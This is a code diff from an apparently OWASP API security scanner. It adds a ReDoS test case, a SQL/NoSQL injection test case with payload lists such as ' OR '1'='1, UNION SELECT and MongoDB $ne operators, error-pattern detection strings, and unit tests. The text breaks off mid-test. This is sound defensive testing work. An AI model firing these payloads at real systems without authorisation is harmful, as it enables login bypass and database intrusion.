+        return "Regular Expression Denial of Service (ReDoS)";
+    }
+
+    @Override
+    public String getDescription() {
+        return "Tests REST endpoint body fields for catastrophic-backtracking regex " +
+               "vulnerabilities by measuring response latency for known ReDoS-triggering input.";
+    }
+
+    @Override
+    public List<Finding> execute(EndpointInfo endpoint, HttpClient httpClient) throws IOException {
+        List<Finding> findings = new ArrayList<>();
+        String method = endpoint.getMethod().toUpperCase();
+        if (!method.equals("POST") && !method.equals("PUT") && !method.equals("PATCH")) {
+            return findings;
+        }
+
+        logger.info("Executing {} test on {}", getId(), endpoint);
+
+        List<String> fields = extractBodyFieldNames(endpoint);
+
+        long baselineElapsed;
+        try {
+            long start = System.currentTimeMillis();
+            sendRequest(endpoint, httpClient, buildJsonBody(fields, null, null));
+            baselineElapsed = System.currentTimeMillis() - start;
+        } catch (Exception e) {
+            logger.debug("Could not establish a baseline response time for {}, skipping ReDoS test: {}",
+                    endpoint, e.getMessage());
+            return findings;
+        }
+
+        long slowThreshold = Math.max(ABSOLUTE_SLOW_THRESHOLD_MS, baselineElapsed * BASELINE_MULTIPLIER);
+
+        for (String field : fields) {
+            for (String payload : REDOS_PAYLOADS) {
+                boolean timedOut = false;
+                long elapsed;
+                long start = System.currentTimeMillis();
+                try {
+                    sendRequest(endpoint, httpClient, buildJsonBody(fields, field, payload));
+                } catch (IOException e) {
+                    // A connect/read timeout while processing this specific payload is itself
+                    // strong evidence of a hang — treat it as the slowest possible signal rather
+                    // than silently swallowing it like other test cases' generic catch blocks do.
+                    timedOut = true;
+                } catch (Exception e) {
+                    logger.debug("Error testing ReDoS on {} field {}: {}", endpoint, field, e.getMessage());
+                    continue;
+                }
+                elapsed = System.currentTimeMillis() - start;
+
+                if (timedOut || elapsed > slowThreshold) {
+                    Finding finding = new Finding(
+                            UUID.randomUUID().toString(),
+                            "Regular Expression Denial of Service (ReDoS)",
+                            String.format("Submitting a catastrophic-backtracking payload in the '%s' field " +
+                                    "caused the response to take %s, versus a %dms baseline — indicating a " +
+                                    "vulnerable regular expression is used to validate this field.",
+                                    field, timedOut ? "longer than the connection timeout" : elapsed + "ms",
+                                    baselineElapsed),
+                            Severity.HIGH,
+                            getId(),
+                            endpoint.getMethod() + " " + endpoint.getPath(),
+                            "Avoid regular expressions with nested or overlapping quantifiers (e.g. " +
+                            "(a+)+, (a|a)+) for user-supplied input validation. Use a regex engine with " +
+                            "linear-time guarantees, impose a maximum input length before validation, or " +
+                            "use a bounded validation timeout."
+                    );
+                    finding.setRequestDetails(endpoint.getMethod() + " " + endpoint.getFullUrl() +
+                            "\nField: " + field + "\nPayload length: " + payload.length() + " characters");
+                    finding.setEvidence(timedOut
+                            ? "Request timed out (baseline was " + baselineElapsed + "ms)"
+                            : "Response took " + elapsed + "ms (baseline: " + baselineElapsed + "ms)");
+                    findings.add(finding);
+                    return findings; // one confirmed hang is enough
+                }
+            }
+        }
+
+        return findings;
+    }
+
+    private List<String> extractBodyFieldNames(EndpointInfo endpoint) {
+        String body = endpoint.getRequestBody();
+        if (body != null && !body.isBlank()) {
+            try {
+                JsonNode root = objectMapper.readTree(body);
+                if (root.isObject()) {
+                    List<String> fields = new ArrayList<>();
+                    Iterator<String> names = root.fieldNames();
+                    while (names.hasNext()) {
+                        fields.add(names.next());
+                    }
+                    if (!fields.isEmpty()) {
+                        return fields;
+                    }
+                }
+            } catch (Exception e) {
+                logger.debug("Could not parse request body fields for {}, using common field names: {}",
+                        endpoint, e.getMessage());
+            }
+        }
+        return TARGET_FIELD_NAMES;
+    }
+
+    private String buildJsonBody(List<String> allFields, String targetField, String payload) {
+        StringBuilder sb = new StringBuilder("{");
+        for (int i = 0; i < allFields.size(); i++) {
+            if (i > 0) sb.append(",");
+            String field = allFields.get(i);
+            String value = field.equals(targetField) ? payload : "test";
+            sb.append("\"").append(field).append("\":\"").append(escapeJson(value)).append("\"");
+        }
+        sb.append("}");
+        return sb.toString();
+    }
+
+    private HttpResponse sendRequest(EndpointInfo endpoint, HttpClient httpClient, String body) throws IOException {
+        String url = endpoint.getFullUrl();
+        String contentType = endpoint.getContentType() != null ? endpoint.getContentType() : "application/json";
+        return switch (endpoint.getMethod().toUpperCase()) {
+            case "POST"  -> httpClient.postWithStatus(url, Map.of(), contentType, body);
+            case "PUT"   -> httpClient.putWithStatus(url, Map.of(), contentType, body);
+            case "PATCH" -> httpClient.patchWithStatus(url, Map.of(), contentType, body);
+            default -> null;
+        };
+    }
+
+    private String escapeJson(String value) {
+        return value.replace("\\", "\\\\").replace("\"", "\\\"");
+    }
+}

--- a/src/main/java/org/owasp/astf/testcases/SqlNoSqlInjectionTestCase.java
+++ b/src/main/java/org/owasp/astf/testcases/SqlNoSqlInjectionTestCase.java
@@ -1,0 +1,425 @@
+package org.owasp.astf.testcases;
+
+import java.io.IOException;
+import java.net.URLEncoder;
+import java.nio.charset.StandardCharsets;
+import java.util.ArrayList;
+import java.util.Iterator;
+import java.util.List;
+import java.util.Map;
+import java.util.UUID;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.owasp.astf.core.EndpointInfo;
+import org.owasp.astf.core.http.HttpClient;
+import org.owasp.astf.core.http.HttpResponse;
+import org.owasp.astf.core.result.Finding;
+import org.owasp.astf.core.result.Severity;
+
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+/**
+ * Tests ordinary REST endpoint body fields for SQL and NoSQL injection.
+ *
+ * <p>Other test cases in this framework only probe for injection in narrow circumstances:
+ * {@code UnsafeConsumptionOfApisTestCase} only tests endpoints whose <em>path</em> matches
+ * integration-style keywords ({@code webhook}, {@code proxy}, {@code sync}, ...), and
+ * {@code GraphQLSecurityTestCase}'s resolver-injection check only targets GraphQL mutation
+ * arguments. Neither covers an ordinary REST endpoint's JSON body fields regardless of the
+ * endpoint's path or protocol — a gap found by tracing ASTF's actual findings against VAmPI's
+ * and crAPI's own documented SQL/NoSQL injection vulnerabilities and finding neither was ever
+ * attempted.</p>
+ *
+ * <p>Also tests unresolved OpenAPI path-template segments (e.g. {@code /users/v1/{username}})
+ * directly with injection payloads, regardless of HTTP method — found necessary by live-testing
+ * against VAmPI, whose actual documented SQL injection vulnerability is on a path parameter of a
+ * GET endpoint, a surface the original body-only implementation of this test case couldn't
+ * reach at all.</p>
+ *
+ * <p>Test case ID: {@code ASTF-INJECTION-2023} — injection doesn't map to a single numbered
+ * OWASP API Security Top 10 (2023) category (the risk is distributed across several), so this
+ * follows the same convention already used for GraphQL/gRPC/mTLS/LLM.</p>
+ */
+public class SqlNoSqlInjectionTestCase implements TestCase {
+    private static final Logger logger = LogManager.getLogger(SqlNoSqlInjectionTestCase.class);
+
+    // Used when the endpoint's discovered request body doesn't have any fields to target —
+    // common field names likely to be present on a real POST/PUT/PATCH body.
+    private static final List<String> COMMON_BODY_FIELDS = List.of(
+            "email", "username", "password", "search", "query", "filter", "name", "title", "id"
+    );
+
+    private static final List<String> CREDENTIAL_FIELD_NAMES = List.of("password", "pass", "pwd");
+    private static final List<String> AUTH_PATH_PATTERNS = List.of("login", "auth", "signin", "session");
+
+    // Matches an unresolved OpenAPI path template placeholder, e.g. "/{username}" — the literal
+    // placeholder text, injected into directly rather than resolved to a real value first (unlike
+    // BrokenObjectLevelAuthorizationTestCase's resolution, injection payloads don't need a real
+    // resource to exist behind the parameter to trigger a vulnerable query).
+    private static final Pattern PATH_TEMPLATE_PATTERN = Pattern.compile("/\\{([^/{}]+)\\}");
+
+    // Non-destructive SQL injection payloads — tautology and UNION-based, no DDL/DML.
+    private static final List<String> SQL_PAYLOADS = List.of(
+            "'",
+            "' OR '1'='1",
+            "' OR 1=1-- -",
+            "1' UNION SELECT NULL-- -",
+            "'; SELECT 1-- -"
+    );
+
+    private static final List<String> SQL_ERROR_INDICATORS = List.of(
+            "sql syntax", "sqlstate", "mysql_fetch", "ora-01756", "postgresql query failed",
+            "sqlite3::", "unclosed quotation mark", "syntax error at or near", "pg::syntaxerror",
+            "you have an error in your sql syntax", "npgsql.postgresexception",
+            // Python/SQLAlchemy (Flask/Django) — found missing entirely via live testing against
+            // VAmPI, whose real SQLi vulnerability produces exactly this error shape and was
+            // silently missed until these were added. One of the most common web stacks, so this
+            // was a significant blind spot, not a minor omission.
+            "sqlalchemy.exc", "sqlite3.operationalerror", "sqlite3.programmingerror",
+            "unrecognized token", "django.db.utils", "psycopg2.errors",
+            // Java/JDBC and generic ORM error-wrapper class names
+            "java.sql.sqlexception", "jdbcexception", "hibernate.exception",
+            // Node.js drivers
+            "sequelizedatabaseerror", "sqlite_error"
+    );
+
+    // MongoDB-style NoSQL operator injection — sent as the field's raw JSON value, not a string.
+    private static final List<String> NOSQL_OPERATOR_PAYLOADS = List.of(
+            "{\"$ne\": null}",
+            "{\"$gt\": \"\"}",
+            "{\"$regex\": \".*\"}"
+    );
+
+    private static final List<String> NOSQL_ERROR_INDICATORS = List.of(
+            "mongoerror", "bsonerror", "casterror", "e11000 duplicate key", "$where is not allowed",
+            "mongoclient", "mongoose"
+    );
+
+    // Reused from the same class of false-positive fix as BrokenAuthenticationTestCase: a NoSQL
+    // auth-bypass attempt is only meaningful if the response doesn't ALSO carry an explicit
+    // failure signal despite a 2xx status (some APIs return 200 on both success and failure).
+    private static final List<String> AUTH_FAILURE_BODY_MARKERS = List.of(
+            "\"status\":\"fail\"", "\"success\":false", "incorrect", "invalid credentials",
+            "invalid username", "invalid password", "authentication failed", "unauthorized"
+    );
+
+    private final ObjectMapper objectMapper = new ObjectMapper();
+
+    @Override
+    public String getId() {
+        return "ASTF-INJECTION-2023";
+    }
+
+    @Override
+    public String getName() {
+        return "SQL/NoSQL Injection";
+    }
+
+    @Override
+    public String getDescription() {
+        return "Tests REST endpoint body fields for SQL and NoSQL injection, independent of " +
+               "path naming — complementing the narrower, path-keyword-gated injection checks " +
+               "elsewhere in this framework.";
+    }
+
+    @Override
+    public List<Finding> execute(EndpointInfo endpoint, HttpClient httpClient) throws IOException {
+        List<Finding> findings = new ArrayList<>();
+        logger.info("Executing {} test on {}", getId(), endpoint);
+
+        findings.addAll(testPathParameterSqlInjection(endpoint, httpClient));
+        if (!findings.isEmpty()) {
+            return findings;
+        }
+
+        String method = endpoint.getMethod().toUpperCase();
+        if (!method.equals("POST") && !method.equals("PUT") && !method.equals("PATCH")) {
+            return findings;
+        }
+
+        List<String> targetFields = extractBodyFieldNames(endpoint);
+        boolean isAuthLike = isAuthLikeEndpoint(endpoint);
+
+        findings.addAll(testSqlInjection(endpoint, httpClient, targetFields));
+        if (findings.isEmpty()) {
+            findings.addAll(testNoSqlInjection(endpoint, httpClient, targetFields, isAuthLike));
+        }
+        return findings;
+    }
+
+    /**
+     * Injects SQL payloads directly into the endpoint's dynamic path segment, regardless of HTTP
+     * method. Unlike {@link #testSqlInjection}, this reaches GET/DELETE endpoints too, since a
+     * path parameter doesn't need a request body to be present or exploitable — this is exactly
+     * the shape of VAmPI's own documented SQL injection vulnerability (a GET endpoint with a
+     * vulnerable username path parameter).
+     * <p>
+     * Handles two cases: an unresolved OpenAPI template placeholder (e.g. {@code /{username}} —
+     * the literal placeholder text, when {@link org.owasp.astf.core.Scanner} didn't or couldn't
+     * resolve it first), or an already-resolved real value in that same position (e.g. {@code
+     * /name1}, per {@link EndpointInfo#isResolvedFromTemplate()} — Scanner resolves templates
+     * centrally before test cases run, so this is the common case in a real scan). Either way,
+     * the segment gets replaced with the injection payload rather than left alone.
+     */
+    private List<Finding> testPathParameterSqlInjection(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+
+        String path = endpoint.getPath();
+        String segmentToReplace;
+        String segmentLabel;
+
+        Matcher matcher = PATH_TEMPLATE_PATTERN.matcher(path);
+        if (matcher.find()) {
+            segmentToReplace = matcher.group(); // e.g. "/{username}" — still unresolved
+            segmentLabel = matcher.group(1);
+        } else if (endpoint.isResolvedFromTemplate()) {
+            int lastSlash = path.lastIndexOf('/');
+            if (lastSlash < 0 || lastSlash == path.length() - 1) {
+                return findings;
+            }
+            segmentToReplace = path.substring(lastSlash); // e.g. "/name1" — already resolved
+            segmentLabel = path.substring(lastSlash + 1);
+        } else {
+            return findings; // no dynamic path segment to inject into at all
+        }
+
+        for (String payload : SQL_PAYLOADS) {
+            try {
+                String encodedPayload = URLEncoder.encode(payload, StandardCharsets.UTF_8);
+                String injectedPath = path.replace(segmentToReplace, "/" + encodedPayload);
+                String url = buildUrl(endpoint, injectedPath);
+
+                HttpResponse response = sendRequestToUrl(endpoint, httpClient, url);
+                String body = response != null ? response.getBody() : null;
+                if (body == null) {
+                    continue;
+                }
+                String lower = body.toLowerCase();
+                for (String indicator : SQL_ERROR_INDICATORS) {
+                    if (lower.contains(indicator)) {
+                        Finding finding = new Finding(
+                                UUID.randomUUID().toString(),
+                                "SQL Injection Vulnerability",
+                                String.format("Submitting a SQL injection payload in the '%s' path parameter " +
+                                        "caused a database error message to appear in the response, " +
+                                        "indicating the value is passed into a SQL query without proper " +
+                                        "parameterization or sanitization.",
+                                        segmentLabel),
+                                Severity.CRITICAL,
+                                getId(),
+                                endpoint.getMethod() + " " + endpoint.getPath(),
+                                "Use parameterized queries or an ORM with proper escaping for all database " +
+                                "access, including path parameters. Never concatenate user input directly " +
+                                "into SQL statements, and disable verbose database error messages in production."
+                        );
+                        finding.setRequestDetails(endpoint.getMethod() + " " + url);
+                        finding.setEvidence("Database error pattern found: " + indicator);
+                        findings.add(finding);
+                        return findings;
+                    }
+                }
+            } catch (Exception e) {
+                logger.debug("Error testing path-parameter SQL injection on {}: {}", endpoint, e.getMessage());
+            }
+        }
+        return findings;
+    }
+
+    /**
+     * Uses the endpoint's own discovered request body fields when available (more accurate —
+     * tests fields the API actually accepts), falling back to a common-name list otherwise.
+     */
+    private List<String> extractBodyFieldNames(EndpointInfo endpoint) {
+        String body = endpoint.getRequestBody();
+        if (body != null && !body.isBlank()) {
+            try {
+                JsonNode root = objectMapper.readTree(body);
+                if (root.isObject()) {
+                    List<String> fields = new ArrayList<>();
+                    Iterator<String> names = root.fieldNames();
+                    while (names.hasNext()) {
+                        fields.add(names.next());
+                    }
+                    if (!fields.isEmpty()) {
+                        return fields;
+                    }
+                }
+            } catch (Exception e) {
+                logger.debug("Could not parse request body fields for {}, using common field names: {}",
+                        endpoint, e.getMessage());
+            }
+        }
+        return COMMON_BODY_FIELDS;
+    }
+
+    private boolean isAuthLikeEndpoint(EndpointInfo endpoint) {
+        String path = endpoint.getPath().toLowerCase();
+        return AUTH_PATH_PATTERNS.stream().anyMatch(path::contains);
+    }
+
+    private List<Finding> testSqlInjection(EndpointInfo endpoint, HttpClient httpClient, List<String> fields) {
+        List<Finding> findings = new ArrayList<>();
+
+        for (String field : fields) {
+            for (String payload : SQL_PAYLOADS) {
+                try {
+                    String body = buildJsonBody(fields, field, "\"" + escapeJson(payload) + "\"");
+                    HttpResponse response = sendRequest(endpoint, httpClient, body);
+                    String responseBody = response != null ? response.getBody() : null;
+
+                    if (responseBody != null) {
+                        String lower = responseBody.toLowerCase();
+                        for (String indicator : SQL_ERROR_INDICATORS) {
+                            if (lower.contains(indicator)) {
+                                Finding finding = new Finding(
+                                        UUID.randomUUID().toString(),
+                                        "SQL Injection Vulnerability",
+                                        String.format("Submitting a SQL injection payload in the '%s' field " +
+                                                "caused a database error message to appear in the response, " +
+                                                "indicating the value is passed into a SQL query without " +
+                                                "proper parameterization or sanitization.", field),
+                                        Severity.CRITICAL,
+                                        getId(),
+                                        endpoint.getMethod() + " " + endpoint.getPath(),
+                                        "Use parameterized queries or an ORM with proper escaping for all " +
+                                        "database access. Never concatenate user input directly into SQL " +
+                                        "statements, and disable verbose database error messages in production."
+                                );
+                                finding.setRequestDetails(endpoint.getMethod() + " " + endpoint.getFullUrl() +
+                                        "\nField: " + field + "\nPayload: " + payload);
+                                finding.setEvidence("Database error pattern found: " + indicator);
+                                findings.add(finding);
+                                return findings; // one confirmed injection is enough for this endpoint
+                            }
+                        }
+                    }
+                } catch (Exception e) {
+                    logger.debug("Error testing SQL injection on {} field {}: {}", endpoint, field, e.getMessage());
+                }
+            }
+        }
+
+        return findings;
+    }
+
+    private List<Finding> testNoSqlInjection(EndpointInfo endpoint, HttpClient httpClient,
+                                              List<String> fields, boolean isAuthLike) {
+        List<Finding> findings = new ArrayList<>();
+
+        for (String field : fields) {
+            for (String payload : NOSQL_OPERATOR_PAYLOADS) {
+                try {
+                    String body = buildJsonBody(fields, field, payload);
+                    HttpResponse response = sendRequest(endpoint, httpClient, body);
+                    String responseBody = response != null ? response.getBody() : null;
+                    if (response == null || responseBody == null) {
+                        continue;
+                    }
+                    String lower = responseBody.toLowerCase();
+
+                    for (String indicator : NOSQL_ERROR_INDICATORS) {
+                        if (lower.contains(indicator)) {
+                            findings.add(buildNoSqlFinding(endpoint, field, payload,
+                                    "NoSQL error pattern found: " + indicator, Severity.MEDIUM,
+                                    "NoSQL Injection — Database Error Disclosed"));
+                            return findings;
+                        }
+                    }
+
+                    // Auth-bypass pattern: a credential-shaped field, on an auth-like endpoint,
+                    // accepting an operator payload (e.g. {"password": {"$ne": null}}) and
+                    // succeeding — the classic NoSQL login-bypass vulnerability class.
+                    boolean isCredentialField = CREDENTIAL_FIELD_NAMES.stream().anyMatch(field::equalsIgnoreCase);
+                    if (isAuthLike && isCredentialField && response.isSuccess()
+                            && AUTH_FAILURE_BODY_MARKERS.stream().noneMatch(lower::contains)) {
+                        findings.add(buildNoSqlFinding(endpoint, field, payload,
+                                "Authentication succeeded (HTTP " + response.getStatusCode() +
+                                ") when the '" + field + "' field was replaced with a MongoDB query operator " +
+                                "instead of a string value", Severity.CRITICAL,
+                                "NoSQL Injection — Authentication Bypass"));
+                        return findings;
+                    }
+                } catch (Exception e) {
+                    logger.debug("Error testing NoSQL injection on {} field {}: {}", endpoint, field, e.getMessage());
+                }
+            }
+        }
+
+        return findings;
+    }
+
+    private Finding buildNoSqlFinding(EndpointInfo endpoint, String field, String payload,
+                                       String evidence, Severity severity, String title) {
+        Finding finding = new Finding(
+                UUID.randomUUID().toString(),
+                title,
+                String.format("Submitting a MongoDB-style query operator in the '%s' field produced a " +
+                        "result indicating the value is passed into a NoSQL query without proper " +
+                        "type validation or sanitization.", field),
+                severity,
+                getId(),
+                endpoint.getMethod() + " " + endpoint.getPath(),
+                "Validate that user-supplied fields are the expected scalar type before using them in a " +
+                "database query (reject objects/operators where a string or number is expected). Use a " +
+                "schema-validation layer (e.g. JSON Schema) ahead of the database access layer, and avoid " +
+                "passing raw client-supplied objects directly into query builders."
+        );
+        finding.setRequestDetails(endpoint.getMethod() + " " + endpoint.getFullUrl() +
+                "\nField: " + field + "\nPayload: " + payload);
+        finding.setEvidence(evidence);
+        return finding;
+    }
+
+    /** Builds a JSON body with every known field set to a benign default, except {@code targetField}. */
+    private String buildJsonBody(List<String> allFields, String targetField, String rawValueJson) {
+        StringBuilder sb = new StringBuilder("{");
+        for (int i = 0; i < allFields.size(); i++) {
+            if (i > 0) sb.append(",");
+            String field = allFields.get(i);
+            sb.append("\"").append(field).append("\":");
+            sb.append(field.equals(targetField) ? rawValueJson : "\"test\"");
+        }
+        sb.append("}");
+        return sb.toString();
+    }
+
+    private HttpResponse sendRequest(EndpointInfo endpoint, HttpClient httpClient, String body) throws IOException {
+        String url = endpoint.getFullUrl();
+        String contentType = endpoint.getContentType() != null ? endpoint.getContentType() : "application/json";
+        return switch (endpoint.getMethod().toUpperCase()) {
+            case "POST"  -> httpClient.postWithStatus(url, Map.of(), contentType, body);
+            case "PUT"   -> httpClient.putWithStatus(url, Map.of(), contentType, body);
+            case "PATCH" -> httpClient.patchWithStatus(url, Map.of(), contentType, body);
+            default -> null;
+        };
+    }
+
+    private String escapeJson(String value) {
+        return value.replace("\\", "\\\\").replace("\"", "\\\"");
+    }
+
+    /** Like {@link #sendRequest}, but targets an explicit URL (for path-parameter injection) and
+     *  covers GET/DELETE as well, since a path parameter needs no request body to be exploitable. */
+    private HttpResponse sendRequestToUrl(EndpointInfo endpoint, HttpClient httpClient, String url) throws IOException {
+        String contentType = endpoint.getContentType() != null ? endpoint.getContentType() : "application/json";
+        return switch (endpoint.getMethod().toUpperCase()) {
+            case "GET"    -> httpClient.getWithStatus(url, Map.of());
+            case "DELETE" -> httpClient.deleteWithStatus(url, Map.of());
+            case "POST"   -> httpClient.postWithStatus(url, Map.of(), contentType, "{}");
+            case "PUT"    -> httpClient.putWithStatus(url, Map.of(), contentType, "{}");
+            case "PATCH"  -> httpClient.patchWithStatus(url, Map.of(), contentType, "{}");
+            default -> null;
+        };
+    }
+
+    private String buildUrl(EndpointInfo endpoint, String path) {
+        String base = endpoint.getBaseUrl();
+        if (base == null || base.isEmpty()) return path;
+        base = base.endsWith("/") ? base.substring(0, base.length() - 1) : base;
+        return base + (path.startsWith("/") ? path : "/" + path);
+    }
+}

--- a/src/main/java/org/owasp/astf/testcases/TestCaseRegistry.java
+++ b/src/main/java/org/owasp/astf/testcases/TestCaseRegistry.java
@@ -40,7 +40,9 @@ public class TestCaseRegistry {
         register(new GrpcEndpointDetectionTestCase());             // gRPC detection
         register(new MutualTlsValidationTestCase());               // mTLS client-cert validation
         register(new LlmPromptInjectionTestCase());                // LLM/chatbot prompt injection
-        logger.info("Registered {} default test cases (OWASP API Security Top 10 2023 + GraphQL/gRPC/mTLS/LLM)",
+        register(new SqlNoSqlInjectionTestCase());                  // general REST body SQL/NoSQL injection
+        register(new RegexDosTestCase());                           // ReDoS via catastrophic-backtracking input
+        logger.info("Registered {} default test cases (OWASP API Security Top 10 2023 + GraphQL/gRPC/mTLS/LLM/Injection/ReDoS)",
                 availableTestCases.size());
     }
 

--- a/src/test/java/org/owasp/astf/core/EndpointInfoTest.java
+++ b/src/test/java/org/owasp/astf/core/EndpointInfoTest.java
@@ -1,0 +1,50 @@
+package org.owasp.astf.core;
+
+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.api.Test;
+
+import static org.junit.jupiter.api.Assertions.*;
+
+@DisplayName("EndpointInfo unit tests")
+class EndpointInfoTest {
+
+    @Test
+    @DisplayName("getFullUrl percent-encodes an unresolved path-template placeholder (regression: VAmPI hang)")
+    void testGetFullUrlEncodesCurlyBraces() {
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/{username}", "GET");
+        endpoint.setBaseUrl("http://127.0.0.1:5002");
+
+        String url = endpoint.getFullUrl();
+
+        assertFalse(url.contains("{") || url.contains("}"),
+                "Raw curly braces must never reach the wire — a literal '{'/'}' in an HTTP " +
+                "request line caused VAmPI's dev server to hang the connection with no response");
+        assertEquals("http://127.0.0.1:5002/users/v1/%7Busername%7D", url);
+    }
+
+    @Test
+    @DisplayName("getFullUrl leaves an already-concrete path untouched")
+    void testGetFullUrlLeavesNormalPathUnchanged() {
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/name1", "GET");
+        endpoint.setBaseUrl("http://127.0.0.1:5002");
+
+        assertEquals("http://127.0.0.1:5002/users/v1/name1", endpoint.getFullUrl());
+    }
+
+    @Test
+    @DisplayName("getFullUrl falls back to the path alone when no base URL is set")
+    void testGetFullUrlNoBaseUrl() {
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/{username}", "GET");
+        assertEquals("/users/v1/%7Busername%7D", endpoint.getFullUrl());
+    }
+
+    @Test
+    @DisplayName("resolvedFromTemplate defaults to false and reflects setter changes")
+    void testResolvedFromTemplateFlag() {
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/{username}", "GET");
+        assertFalse(endpoint.isResolvedFromTemplate());
+
+        endpoint.setResolvedFromTemplate(true);
+        assertTrue(endpoint.isResolvedFromTemplate());
+    }
+}

--- a/src/test/java/org/owasp/astf/core/discovery/PathTemplateResolverTest.java
+++ b/src/test/java/org/owasp/astf/core/discovery/PathTemplateResolverTest.java
@@ -1,0 +1,99 @@
+package org.owasp.astf.core.discovery;
+
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.api.Test;
+import org.mockito.Mock;
+import org.mockito.MockitoAnnotations;
+import org.owasp.astf.core.EndpointInfo;
+import org.owasp.astf.core.http.HttpClient;
+import org.owasp.astf.core.http.HttpResponse;
+
+import java.io.IOException;
+import java.util.Map;
+
+import static org.junit.jupiter.api.Assertions.*;
+import static org.mockito.ArgumentMatchers.anyMap;
+import static org.mockito.ArgumentMatchers.anyString;
+import static org.mockito.ArgumentMatchers.eq;
+import static org.mockito.Mockito.when;
+
+@DisplayName("PathTemplateResolver unit tests")
+class PathTemplateResolverTest {
+
+    @Mock
+    private HttpClient httpClient;
+
+    @BeforeEach
+    void setUp() {
+        MockitoAnnotations.openMocks(this);
+    }
+
+    @Test
+    @DisplayName("Resolves a template placeholder to a real value discovered from the collection endpoint")
+    void testResolvesTemplateToRealValue() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/books/v1/{book_title}", "GET");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(eq("https://example.com/books/v1"), eq(Map.of())))
+                .thenReturn(new HttpResponse(200, "[{\"book_title\":\"bookTitle82\"}]", Map.of()));
+
+        EndpointInfo resolved = PathTemplateResolver.resolve(endpoint, httpClient);
+
+        assertEquals("/books/v1/bookTitle82", resolved.getPath());
+        assertTrue(resolved.isResolvedFromTemplate());
+        assertEquals("https://example.com", resolved.getBaseUrl());
+    }
+
+    @Test
+    @DisplayName("Returns the original endpoint unchanged when there's no template placeholder")
+    void testNoPlaceholderReturnsOriginal() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/42", "GET");
+
+        EndpointInfo result = PathTemplateResolver.resolve(endpoint, httpClient);
+
+        assertSame(endpoint, result, "Should return the exact same instance when there's nothing to resolve");
+        assertFalse(result.isResolvedFromTemplate());
+    }
+
+    @Test
+    @DisplayName("Returns the original endpoint unchanged when resolution fails (collection lookup 404s)")
+    void testResolutionFailureLeavesEndpointUnchanged() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/books/v1/{book_title}", "GET");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(eq("https://example.com/books/v1"), eq(Map.of())))
+                .thenReturn(new HttpResponse(404, "", Map.of()));
+
+        EndpointInfo result = PathTemplateResolver.resolve(endpoint, httpClient);
+
+        assertSame(endpoint, result, "Should return the original endpoint, never drop it, when resolution fails");
+        assertFalse(result.isResolvedFromTemplate());
+        assertEquals("/books/v1/{book_title}", result.getPath(), "Path should remain the unresolved template");
+    }
+
+    @Test
+    @DisplayName("Is idempotent — calling resolve() on an already-resolved endpoint is a no-op")
+    void testIdempotentOnAlreadyResolvedEndpoint() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/books/v1/bookTitle82", "GET");
+        endpoint.setResolvedFromTemplate(true);
+
+        EndpointInfo result = PathTemplateResolver.resolve(endpoint, httpClient);
+
+        assertSame(endpoint, result);
+    }
+
+    @Test
+    @DisplayName("Handles exceptions gracefully, returning the original endpoint")
+    void testHandlesExceptionsGracefully() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/books/v1/{book_title}", "GET");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), anyMap())).thenThrow(new IOException("Connection refused"));
+
+        assertDoesNotThrow(() -> {
+            EndpointInfo result = PathTemplateResolver.resolve(endpoint, httpClient);
+            assertSame(endpoint, result);
+        });
+    }
+}

--- a/src/test/java/org/owasp/astf/testcases/BrokenAuthenticationTestcaseTest.java
+++ b/src/test/java/org/owasp/astf/testcases/BrokenAuthenticationTestcaseTest.java
@@ -14,6 +14,10 @@ import org.owasp.astf.core.http.HttpResponse;
 import org.owasp.astf.core.result.Finding;
 
 import java.io.IOException;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.interfaces.RSAPublicKey;
+import java.util.Base64;
 import java.util.List;
 import java.util.Map;
 import java.util.stream.Stream;
@@ -65,9 +69,14 @@ class BrokenAuthenticationTestCaseTest {
 
         if (isAuth && method.equals("POST")) {
             assertFalse(findings.isEmpty(), "Auth endpoints should produce findings");
-            assertEquals(1, findings.size(), "Should have one finding for auth endpoint");
-            assertEquals("Authentication Endpoint Requires Manual Review", findings.get(0).getTitle(),
-                    "Finding should indicate manual review needed");
+            assertTrue(findings.stream().anyMatch(f ->
+                            "Authentication Endpoint Requires Manual Review".equals(f.getTitle())),
+                    "Should include the manual-review finding when no weak credentials are accepted");
+            // Every attempt in this test returns 401 with no 429/423 lockout signal at any point —
+            // testBruteForceLockout (#97) correctly flags that as a separate, additional finding.
+            assertTrue(findings.stream().anyMatch(f ->
+                            "No Account Lockout or Rate Limiting on Repeated Failed Logins".equals(f.getTitle())),
+                    "Should flag missing lockout when 8 consecutive attempts never trigger one");
         } else if (isAuth) {
             assertTrue(findings.isEmpty(), "Non-POST auth endpoints should not produce findings");
         }
@@ -316,5 +325,193 @@ class BrokenAuthenticationTestCaseTest {
         // POST endpoint: both testMissingAuthentication and testJwtNoneAlgorithm use postWithStatus,
         // which returns 401, so no findings expected.
         assertTrue(postFindings.isEmpty(), "Should not find issues with POST method when server returns 401");
+    }
+
+    // ── user enumeration (#97) ───────────────────────────────────────────────
+
+    @Test
+    @DisplayName("Detects user enumeration when a common username's response differs from a random one")
+    void testUserEnumerationDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/login", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                argThat(body -> body != null && body.contains("nonexistent_"))))
